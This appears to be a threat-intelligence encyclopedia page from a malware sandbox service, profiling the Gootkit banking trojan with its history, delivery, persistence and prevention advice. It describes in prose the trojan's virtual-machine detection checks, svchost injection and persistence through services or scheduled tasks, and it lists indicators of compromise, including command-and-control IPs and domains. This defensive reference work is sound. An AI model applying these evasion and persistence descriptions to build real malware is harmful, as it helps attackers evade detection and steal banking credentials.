Gootkit

Gootkit an advanced banking trojan. It is extremely good at evading detection and has an incredibly effective persistence mechanism which makes it a dangerous malware that researchers and organizations should be aware of.

Type
Trojan
Origin
Unknown
First seen
1 June, 2014
Last seen
22 September, 2020
Also known as
Waldek
Xswkit
Talalpek
Global rank
29
Week rank
25
Month rank
34
IOCs
907

What is Gootkit malware?

Gootkit is a banking Trojan – a malware created to steal banking credentials. In fact, Gootkit is classified as one top sophisticated banking Trojans ever created. It relies on complex anti-evasion and persistence mechanisms, as well as complex techniques like dynamic web injections.

Since its initial discovery in 2014, Gootkit has been utilized in multiple attacks that targeted bank accounts across Europe, some of which were very destructive.

Gootkit is known to affect the most widely used web-browsers, namely IE, Firefox, and Chrome. Interestingly, this trojan is coded mostly using the node.js programming language – not the first choice when it comes to the majority of operators. What’s more, while a lot of similar malicious programs heavily utilize leaked source code of older samples, Gootkit appears to be written almost 100% from scratch.

General description of Gootkit

The roots of this malware go all the way back to the year 2010 when what can be called the predecessor of Gootkit was first documented. Classified at the time as an information stealer which did not pose a significant danger, Gootkit has since evolved into a full-fledged banking Trojan.

The malware has been documented in its present form of a Trojan since 2014, involved in attacks targeting both private and corporate victims in Europe, mainly targeting banks in France and England, although, Spanish and Italian banks have also been reportedly attacked.

Unlike some other Trojans, Gootkit is not available for sale on the internet. It’s code also hasn’t been leaked and all attacks involving this malware have been carried out by a Russian-speaking group of hackers.

Creators of this Trojan have implemented some of the most cutting-edge anti-evasion tricks to make sure the payload will stay hidden for as long as possible and to prevent successful analysis by cybersecurity researchers. Comprised of two main parts, the dropper and the Trojan itself – Gootkit carries out sandbox checks on every stage of its life cycle. Meaning, that both the dropper and the actual trojan have unique anti-evasion procedures.

Once the dropper makes its way into a machine, it will conduct the initial VM check, making sure that the malware is not being launched in a virtual environment. This is achieved by verifying the system’s processor value inside the Windows Registry by checking for specific names of virtual servers. In addition, BIOS is also checked to find any values which could point at the malware being launched on a VM. If the malware detects that it is not being launched on a real machine, it terminates all activities and connects to the control server to blacklist the endpoint it was launched in.

However, if the initial test is passed, the loader installs the main Gootkit executable which, in turn, repeats some of the previous checks, while adding several new ones. In one of the new checks, the malware checks the whitelist of names admissible for the CPU to determine that a VM name is absent from the list. Following this test, the malware scans to find VMWare, VBOX or SONI values on IDE/SCSI hard drives.

Such thorough virtual machine checks are not the only jack up the sleeve that Gootkit has when it comes to evasion. To increase the success rate of installs, the malware creators frequently make modifications to the Trojan, changing the targeted processes for injections and filetypes of the executable.

For example, instead of running an .exe file, some samples of Gootkit load a DLL directly into a target process. What’s more, while the majority of malware select the explorer.exe process, as their injection target, Gootkit targets a service host (svchost) process instead. Presumably, this is done to further evade detections, since injecting into a process with several instances makes Gootkit easier to hide.

In addition to advanced anti-detection methods, Gootkit malware employs equally sophisticated persistence techniques to ensure that its deletion from an infected machine will prove as complicated as possible. The malware provides two main persistence mechanisms which are used depending on the available system rights. When launched from an admin account, Gootkit can mimic a Windows service with a random name, which helps to confuse users. This way, it is able to launch before a victim logs on and continue running even after he or she logs off.

However, if launched from a least-privilege user account, the virus writes itself as a scheduled task, also with a random name. This task is programmed to run every minute and on every boot, ensuring that the malware will remain on a machine after antivirus software scans and system reboots.

Gootkit malware analysis

A video of the simulation recorded in the ANY.RUN malware hunting service allows us to take a closer look at the execution of Gootkit and see this malware in action. The video is available here.

gootkit execution process graph

Figure 1: the lifecycle of Gootkit can be viewed in a visual format on the process graph generated by the ANY.RUN online analysis sandbox.

text report of the gootkit malware analysis

Figure 2: This text report available at this link provides more detailed information about Gootkit execution processes, artifacts and more.

Gootkit execution process

Gootkit often gets into the system as an email attachment in the form of a Microsoft Word file. After the user opens the malicious file, it starts Powershell to download the main payload.

It should be noted that in some cases, Gootkit postpones the execution by putting itself in scheduled tasks. After the main payload execution starts, Gootkit unpacks and launches itself. This process provides the main malicious activity - stealing personal information, downloading other malware, grabbing video of the victim’s desktop, hijacking banking credentials, connecting to C2 servers and so on. In the given example Gootkit also uses WMIC.EXE to obtain a list of AntiViruses.

Distribution of Gootkit

Gootkit utilizes multiple attack vectors to infect its victims, including popular exploit kits like Neutrino and Angler, allowing the malware to get into machines with not-up-to-date operating systems.

The second used attack vector is email spam, where Gootkit is delivered to users as a malicious email attachment and social engineering is used to trick the user into downloading the malicious file.

How to avoid infection by Gootkit?

There are several rules of online safety that can be followed to greatly reduce the risk of infection by malware such as Gootkit. For instance, users are advised to install the freshest OS updates, as well as update applications that users utilize on a regular basis.

At the same time, those applications that are rarely opened should be deleted from the machine. In addition, it is advised to disable ads in the browser and avoid visiting suspicious websites. Furthermore, if a private inbox is used at work instead of a corporate one, a user should restrain from sending sensitive information to and from this personal email address.

It should be noted, that opening email attachments in suspicious emails always poses a high risk of injection, therefore users must never run suspicious programs downloaded from emails sent from unrecognized addresses.

How to export Gootkit data using ANY.RUN?

If the analyst wants to do additional work with events from tasks or just want to share them with colleagues they can export to different formats. Just click on the "Export" button and choose the most suitable format in the drop-down menu

options for export events from tasks with gootkit Figure 3: Options for export events from tasks with Gootkit

Conclusion

Although Gootkit is responsible for a negligible percentage of the overall attacks by financial malware, this Trojan should be considered an extremely high-risk danger. Thanks to its sophisticated persistence and anti-evasion functions, it is capable of potentially very damaging attacks.

What’s more, following the development of this Trojan over the years, it is safe to assume that its evolution will continue and cybercriminals behind the malware will keep producing ways to evade modern security solutions.

That’s why, utilizing the most reliable and cutting edge analysis tools, such as the ANY.RUN malware hunting service can be a key to setting up a secure cyber defense against serious threats like Gootkit.

IOCs

IP addresses
5.45.71.227
216.218.185.162
216.218.135.114
91.193.181.158
37.1.207.160
50.63.202.74
5.61.34.67
5.61.34.67
184.105.76.250
64.71.188.178
37.1.214.148
216.218.208.114
185.4.65.222
222.122.84.57
185.158.248.151
183.111.141.97
183.111.141.97
185.158.248.133
5.45.127.15
31.214.157.4
Hashes
b9259cfe17fc84fbcfb808c833d59e8b9263a003ecf71d3d42c884a8cf9cc572
bbf568feec587287131bc88bfac813613588cba4f544839ebfde5ae1344de6cc
fdb64d61d30390687e23a2e461aa67329b4aa5649215dea6dd2f0bbe0638497d
2178eda7504a62c0451e35bf26f56c4f699940f359efc0b82dc662f964144415
f7ecd1b95bc537cc04d2b4503c66000c465f4398b71da2a00e2a0d804477c992
8955ee03217bc2539e2f80e58f51d30aa97e7512d96592f098133c8036e363dd
9dc8cf24bff33f8c5085cf537268bd1bdcba30ca93e75d30ff9ee60601b1b2fc
71d8ad6cb9b82f5db70daaa0ced5e6afeed1c100f3a84f853f9efed5132f9419
ae5bcbd794491ba8cd8f3d9bc50d51d8d3609da8797516cf0bdea90169dc1fcc
d5aeed584ea7bbb1aa14a303fdaff373e71205a9a89d9d374d22b5da20049560
90c388ff1a4a30e4256b0c89627d25ef7d01bc9d16df991fb49ad14beac5410b
0a4cc9853314d239f89249e5b6acae8ab2d3e5afbd9e124b6571517a12a00a80
ff575a3ae768fff422e4945ba5eae5fd779566ac9c708ff52c40280a0b9b26b0
21cce87070172e994d87cb44993862ede6801d075fcc956f4ba7d2042fc3b895
d525959dc9395b553dde2427f7644a687a700b31bed173427c0289019e71d457
2f96ad966db0a1a93e3ec395b0e8b4b9e3b06c7900522bc2551be1a6cc73e606
feeab70c74910498fb28a6462a7da2059a58c3f7017170ed66e6ca66bd7ec102
ab091699bced6f697de20721bcdbbc778bc7191c6e90b38d50fec1a590b7998d
bd5423ac1d4aa6ab5fe7aeeb4969f7aa5b31e066472509243aa5c79f81e4b3f5
6724391aff802b1911e3e2c1a7268a12ce4e24e7caf882d3d0c53552e43bbd65
Domains
majul.com
isns.net
celebs.gallery
i-took-eyes.xyz
activeterroristwarningcompany.com
oththukaruva.com
w0cdshof1vw4gxy4g65.ddns.net
k6qxufidsfa8axmn3xi.ddns.net
ivyxox3ti4whc0u.ddns.net
oljjbfgtckwrkmdbs.com
oljjbfgtckwrkmdbs.com
jiylhedvnplmrigqv.me
nkvisiujbuhkcvrqw.com
epl.paypal.communication.com
jw61gd6328hdy3tep.cc
assumenextelbelow.com
piwxvumpyptp.in
piwxvumpyptp.net
piwxvumpyptp.com
www.medicinecomplete.com

HAVE A LOOK AT

Adwind screenshot
Adwind
adwind trojan
Adwind RAT, sometimes also called Unrecom, Sockrat, Frutas, jRat and JSocket is a Malware As A Service Remote Access Trojan that attackers can use to collect information from infected machines. It was one of the most popular RATs in the market in 2015.
Read More
Agent Tesla screenshot
Agent Tesla
agenttesla trojan rat stealer
Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.
Read More
Ave Maria screenshot
Ave Maria
avemaria stealer trojan rat
Ave Maria malware is a Remote Access Trojan that is also called WARZONE RAT. Hackers use it to control PCs of their victims remotely and steal information from infected PCs. For example, they can remotely activate the camera to take pictures of a victim and send them to a control server
Read More
Azorult screenshot
Azorult
azorult trojan rat
AZORult can steal banking information including passwords and credit card details as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat.
Read More
Crimson RAT screenshot
Crimson RAT
crimson rat trojan
Crimson is a Remote Access Trojan — a malware that is used to take remote control of infected systems and steal data. This particular RAT is known to be used by a Pakistani founded cybergang that targets Indian military objects to steal sensitive information.
Read More
Danabot screenshot
Danabot
danabot trojan stealer
Danabot is an advanced banking Trojan malware that was designed to steal financial information from victims. Out of the Trojans in the wild this is one of the most advanced thanks to the modular design and a complex delivery method.
Read More